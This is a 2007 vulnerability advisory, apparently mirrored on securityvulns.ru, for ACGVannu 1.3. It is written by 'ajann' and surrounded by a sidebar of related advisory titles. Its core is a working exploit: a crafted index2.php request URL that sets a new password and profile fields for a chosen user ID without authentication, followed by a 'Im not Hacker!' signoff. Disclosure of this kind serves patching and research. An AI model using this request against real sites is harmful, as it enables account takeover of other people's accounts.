Security Advisory: ACGVannu <= 1.3 (index2.php) Remote User Pass Change Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [Full-disclosure] CVSTrac 2.0.0 Denial of Service (DoS) vulnerability
  MyPHPcommander 2.0 (package.
php) Remote File Include Vulnerability
  AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability
  Xt-Stats v.2.4.0.b3 (server_base_dir)
Remote File Include Vulnerability

From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 29.01.2007
Subject: ACGVannu <= 1.3 (index2.php) Remote User Pass Change Vulnerability

*******************************************************************************
# Title   : ACGVannu <= 1.3 (index2.php) Remote User Pass Change Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://acgv.free.fr
# $$      : Free

*******************************************************************************

[[REMOTE PASS CHANGE]]]

http://[target]/[path]//index2.php [ID VARIABLE]

Example:

ID=USER ID (167)

//index2.
php?id=&nom=ajann2&prenom=ajann2&pass=0002455&rubrik=modif&fo
_remp=oui&id=167&mail=a&url=http:
//a&titre=a&descript=+a+&categorie=G%E9n%E9ral&Submit=Gon
der

[[/REMOTE PASS CHANGE]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!